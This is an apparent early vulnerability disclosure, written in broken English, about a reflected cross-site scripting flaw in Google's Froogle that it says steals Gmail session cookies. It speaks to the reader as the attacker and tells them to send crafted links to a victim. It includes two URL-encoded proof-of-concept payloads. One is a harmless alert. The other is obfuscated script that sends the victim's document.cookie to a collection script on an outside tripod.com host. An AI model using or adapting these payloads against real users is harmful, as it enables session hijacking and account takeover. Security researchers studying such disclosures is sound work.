froogleCookie.txt

`The flaw which was discovered by Nir Goldshlagger  
and was tested many times.  
  
hey this is Cross site Scripting In Froogle And its leads to steal the  
cookie in gmail  
  
if you send this link to the Victim in gmail email:  
  
<<http://froogle.google.com/froogle?q=g&pid=4728103623836774439%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29;%3C/SCRIPT%3E>>  
  
when he click this link you steal is cookie in gmail  
  
And Even if the victim does change his password afterwards, it will be  
to no avail. "The system authenticates the hacker as the victim, using  
the stolen cookie file. Thus no password is involved in the  
authentication process. The victim can change his password as many  
times as he want, and it still won't stop the hacker from using his  
box",  
  
and even if the victim dosent save his cookie in gmail  
  
when he click this cross site scripting link in his gmail account  
  
its still steal his cookie  
  
And if He Save His Cookie in gmail you can send this Cross site  
scripting in any way you want to the victim  
and its will steal his cookie  
  
Proof Of Concept By Nir Goldshlager:  
<<http://froogle.google.com/froogle?q=g&pid=4728103623836774439%22%3e%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%3d%27%68%74%74%70%3a%2f%2f%6e%69%72%67%6f%6c%64%2e%74%72%69%70%6f%64%2e%63%6f%6d%2f%63%67%69%2d%62%69%6e%2f%63%6f%6f%6b%69%65%2f%63%6f%6f%6b%69%65%2e%63%67%69%3f%27%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e>>  
  
Proof OF Concept By Nir Goldshlager  
2:<<http://froogle.google.com/froogle?q=g&pid=4728103623836774439%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29;%3C/SCRIPT%3E>>  
  
This Flaw Was Discovered By Nir Goldshlager  
  
[email protected] <mailto:[email protected]>  
<mailto:[email protected] <mailto:[email protected]>>  
  
Thanks  
`